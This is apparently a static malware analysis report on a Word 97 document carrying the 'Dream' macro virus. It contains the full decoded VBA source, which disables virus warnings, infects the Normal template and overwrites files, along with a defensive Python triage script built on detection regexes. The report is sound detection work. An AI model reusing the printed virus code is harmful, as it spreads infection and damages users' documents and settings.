Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4a4e0fc4195ae998…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 32.0 KB
Created: 1998-08-02 14:56:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: d4511a7d55b9143261053fc1b6c6d2d7
SHA-1: 4482678dfef49d38a6e67d436313a54de72d6ace
SHA-256: 4a4e0fc4195ae9980c74184e58abadf848379ff6a5eb3e6ec743177bb35e04e7
Risk score: 200

Malware Insights

MITRE ATT&CK
  T1059.005 Command and Scripting Interpreter: Visual Basic
  T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  T1566.001 Phishing: Spearphishing Attachment

The sample is a Word 97 (Word 8.0) document whose VBA project contains a module named 'Dream' with an AutoOpen procedure, which is what the critical OLE_VBA_AUTOOPEN heuristic fires on. Reading the recovered source, this is a self-replicating macro virus rather than a downloader. AutoOpen turns off Word's built-in macro virus warning (Options.VirusProtection = False), suppresses alerts and screen updates, deletes the Tools > Macro and Tools > Templates and Add-ins menu entries so the user cannot inspect or remove the project, sets the legacy ToolsOptionsGeneral.SendMailAttach option, and exports the 'Dream' module to the temporary file 'c:\confi~1.~ys'. It then checks whether a 'Dream' component already exists in the Normal template and in the active document. If Normal is infected but the document is not, it imports the module from the temporary file into the document's VBA project; if Normal is clean, it copies the module from the document into Normal with Application.OrganizerCopy and silences the save-Normal prompt. A document that was not previously infected is re-saved in place as a .doc, and the temporary file is deleted with Kill. Procedures named FileOpen, FileNew, FilePrint and FileExit override the corresponding built-in Word commands and call AutoOpen first, so the infection routine re-runs during ordinary use. The payloads are date-based: on the 21st of the month AutoOpen writes a few lines of song lyrics to C:\Windows\Dreams.txt, and FileExit saves the active document under one of seven hard-coded file names to drive f: (on or after the 15th) or m: (otherwise) before quitting Word. There is no network access, no shell or process execution and no registry modification anywhere in the recovered code, so a second-stage download is not supported by the evidence, and the T1547.001 (Registry Run Keys / Startup Folder) mapping does not match what the macro does; persistence is through the infected Normal template, which ATT&CK tracks as T1137.001 (Office Application Startup: Office Template Macros). Both ClamAV signatures fire on this code: Doc.Trojan.Beauty-1 on the OLE container and Doc.Trojan.Dreams-1 on the extracted macro source.

Heuristics (4)

  • ClamAV: Doc.Trojan.Beauty-1 | severity: critical | CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Beauty-1
  • VBA macros detected | severity: medium | OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • AutoOpen macro | severity: high | OLE_VBA_AUTOOPEN
    AutoOpen macro: a procedure named AutoOpen runs as soon as the document is opened with macros enabled, without any further user action.
  • Legacy WordBasic auto-exec macro marker | severity: medium | OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. By itself this is analyst-facing evidence of old Word macro execution surface, not a downloader or parser-CVE attribution. The generic wording of this heuristic ("no modern VBA project was recovered and no stronger macro-virus family marker was present") does not hold for this sample: a VBA project was recovered (macros.bas below) and it carries a classic Normal-template infection routine, so this finding adds nothing beyond OLE_VBA_AUTOOPEN here.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3551 bytes
SHA-256: f1bc3bfa1fc9cbdbbc50c1cee6ad0fef819f11ae710765279f7ab381d5a66aac
Detection: ClamAV: Doc.Trojan.Dreams-1
Obfuscation or embedded second-stage payload: unlikely (the source is plain, unobfuscated VBA; its effects are those described in the summary above)

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Dream"


Sub AutoOpen()
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.Dream.AutoOpen"
  On Error Resume Next
  
  Options.VirusProtection = False
  Application.VBE.ActiveVBProject.VBComponents("Dream").Export "c:\confi~1.~ys"
  
  Application.ScreenUpdating = False
  Application.DisplayAlerts = wdAlertsNone
  
  
  CommandBars("tools").Controls("Macro").Delete
  CommandBars("tools").Controls("Templates and add-ins...").Delete
  ToolsOptionsGeneral.SendMailAttach = 1
  Set GlobalDoc = NormalTemplate
  Set ActiveDoc = ActiveDocument
  GlobalInstalled = False
  DocumentInstalled = False
  
  For j = 1 To NormalTemplate.VBProject.VBComponents.Count
    If NormalTemplate.VBProject.VBComponents(j).Name = "Dream" Then
      GlobalInstalled = True
    End If
  Next
  
  For i = 1 To ActiveDocument.VBProject.VBComponents.Count
    If ActiveDocument.VBProject.VBComponents(i).Name = "Dream" Then
      DocumentInstalled = True
    End If
  Next

   If DocumentInstalled = False And GlobalInstalled = True Then Set Dreamz = ActiveDocument.VBProject
   With Dreamz
With .VBComponents.Import("c:\confi~1.~ys")
End With
End With


If GlobalInstalled = False Then
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Dream", Object:=wdOrganizerObjectProjectItems
    Options.SaveNormalPrompt = False
  End If

If DocumentInstalled = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
  Reset
  Kill "c:\confi~1.~ys"
  
If (Day(Now)) = 21 Then
   
    Open "C:\Windows\Dreams.txt" For Output As 1
    Print #1, ".-=BadDReAms=-."
    Print #1, "When you sleep"
    Print #1, "Do you see an angel in the dying light"
    Print #1, "Or can you see someone standing outside"
    Print #1, "Trying to set you alight."
    Print #1, "Maybe you`ve seen Someone Somewhere before"
    Print #1, "That I might have loved had I never loved you"
    Print #1, "But you only see Me In bad dreams"
    Close 1
 End If
  

 Application.DisplayAlerts = wdAlertsAll
BadDreams:
End Sub

Sub FileOpen()
Call AutoOpen
With Dialogs(wdDialogFileOpen)
    .Show

End With

End Sub

Sub FileNew()
Call AutoOpen
With Dialogs(wdDialogFileNew)
  .Show
End With

End Sub

Sub FilePrint()
Call AutoOpen
With Dialogs(wdDialogFilePrint)
.Show
End With
End Sub

Sub FileExit()
On Error Resume Next


Call AutoOpen

Randomize
  ze = Int(Rnd * 7) + 1
  If ze = 1 Then zet$ = "hardcore.doc"
  If ze = 3 Then zet$ = "Heroinkills.doc"
  If ze = 2 Then zet$ = "Lesbians.doc"
  If ze = 4 Then zet$ = "Desire.doc"
  If ze = 5 Then zet$ = "Gravitykills.doc"
  If ze = 6 Then zet$ = "R.I.P-TaLoN.doc"
  If ze = 7 Then zet$ = "Hope.doc"
  
If (Day(Now)) >= 15 Then
ChangeFileOpenDirectory "f:"
        ActiveDocument.SaveAs FileName:=zet$, LockComments:=False, AddToRecentFiles:=False, ReadOnlyRecommended:=False
    
    ChangeFileOpenDirectory "C:"
    Application.Quit
Else
ChangeFileOpenDirectory "m:"
        ActiveDocument.SaveAs FileName:=zet$, LockComments:=False, AddToRecentFiles:=False, ReadOnlyRecommended:=False
ChangeFileOpenDirectory "c:"

Application.Quit
End If
FUCK:
End Sub
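Added example, not part of the report's analysis tooling and not code from the sample: a stand-alone Python triage script that runs the same kind of checks the heuristics and summary above rely on against decoded VBA text such as macros.bas. It flags auto-executing procedures (AutoOpen and its relatives), built-in Word commands the macro overrides (FileOpen, FileExit and so on), the self-replication and self-protection calls seen in 'Dream' (VirusProtection = False, VBComponents Export/Import, OrganizerCopy into NormalTemplate, SaveNormalPrompt, deletion of the Tools > Macro menu entry), and pulls out drive and path literals as indicators. The rule names, the verdict thresholds and the embedded sample input (a constructed excerpt modelled on the extracted script, not the artifact verbatim) are this example's own assumptions.

```python
"""Triage of decoded VBA source for Word macro-virus behaviour.

Added example for this report: not the report's own tooling and not part of
the sample. Rule names, verdict thresholds and SAMPLE_VBA are assumptions.
"""
import re
from dataclasses import dataclass, field

# Procedure names Word runs without the user explicitly invoking a macro.
AUTO_EXEC = {"autoexec", "autoopen", "autonew", "autoclose", "autoexit",
             "document_open", "document_new", "document_close"}
# Built-in Word commands that a VBA procedure of the same name overrides.
INTERCEPTED = {"fileopen", "filenew", "filesave", "filesaveas", "fileprint",
               "fileexit", "toolsmacro", "toolsoptions"}

# (label, regex) pairs for self-replication and self-protection tricks.
REPLICATION_RULES = [
    ("disables macro virus warning", r"VirusProtection\s*=\s*False"),
    ("exports a VBA module to disk", r"VBComponents\s*\([^)]*\)\s*\.Export\b"),
    ("imports a VBA module from disk", r"VBComponents\s*\.Import\s*\("),
    ("copies a project item into Normal template", r"OrganizerCopy\b.*NormalTemplate"),
    ("silences the save-Normal prompt", r"SaveNormalPrompt\s*=\s*False"),
    ("removes the Tools > Macro menu entry",
     r'CommandBars\s*\(\s*"tools"\s*\)\s*\.Controls\s*\(\s*"Macro"'),
    ("suppresses Word alerts", r"DisplayAlerts\s*=\s*wdAlertsNone"),
]
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)",
                     re.I | re.M)
STRING_RE = re.compile(r'"([^"\r\n]*)"')
# String literals that are a bare drive letter or a drive-rooted path.
PATH_RE = re.compile(r"^[a-z]:(?:\\.*)?$", re.I)


@dataclass
class Triage:
    auto_exec: list = field(default_factory=list)    # auto-executing procedures
    intercepted: list = field(default_factory=list)  # built-in commands overridden
    replication: list = field(default_factory=list)  # matched REPLICATION_RULES labels
    paths: list = field(default_factory=list)        # drive/path literals, de-duplicated


def triage(vba_source: str) -> Triage:
    """Scan decoded VBA text (e.g. olevba output) and collect indicators."""
    t = Triage()
    for m in PROC_RE.finditer(vba_source):
        name = m.group(1)
        if name.lower() in AUTO_EXEC:
            t.auto_exec.append(name)
        elif name.lower() in INTERCEPTED:
            t.intercepted.append(name)
    for label, pattern in REPLICATION_RULES:
        if re.search(pattern, vba_source, re.I):
            t.replication.append(label)
    seen = set()
    for lit in STRING_RE.findall(vba_source):
        if PATH_RE.match(lit) and lit.lower() not in seen:
            seen.add(lit.lower())
            t.paths.append(lit)
    return t


def verdict(t: Triage) -> str:
    """Coarse classification; the thresholds are this example's own choice."""
    if t.auto_exec and len(t.replication) >= 2:
        return "self-replicating macro virus"
    if t.auto_exec or t.intercepted:
        return "auto-executing macro"
    return "macro code without auto-execution"


# Constructed excerpt modelled on the extracted macros.bas above (not verbatim).
SAMPLE_VBA = r'''
Attribute VB_Name = "Dream"
Sub AutoOpen()
  On Error Resume Next
  Options.VirusProtection = False
  Application.VBE.ActiveVBProject.VBComponents("Dream").Export "c:\confi~1.~ys"
  Application.DisplayAlerts = wdAlertsNone
  CommandBars("tools").Controls("Macro").Delete
  With ActiveDocument.VBProject
    With .VBComponents.Import("c:\confi~1.~ys")
    End With
  End With
  Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Dream", Object:=wdOrganizerObjectProjectItems
  Options.SaveNormalPrompt = False
  Kill "c:\confi~1.~ys"
  Open "C:\Windows\Dreams.txt" For Output As 1
End Sub

Sub FileOpen()
Call AutoOpen
End Sub

Sub FileExit()
Call AutoOpen
ChangeFileOpenDirectory "f:"
ActiveDocument.SaveAs FileName:="Hope.doc"
End Sub
'''

if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print("auto-exec:  ", result.auto_exec)
    print("intercepted:", result.intercepted)
    print("replication:", result.replication)
    print("paths:      ", result.paths)
    print("verdict:    ", verdict(result))
```

Run it as a script to print the indicator lists for the embedded sample, or call triage() on olevba's decoded output from a larger pipeline. The point is the combination: an auto-exec entry point plus several replication rules is what separates a Normal-template macro virus like 'Dream' from a macro that merely runs something on open, and the path list gives the analyst the temporary file and drop locations to look for on an infected host.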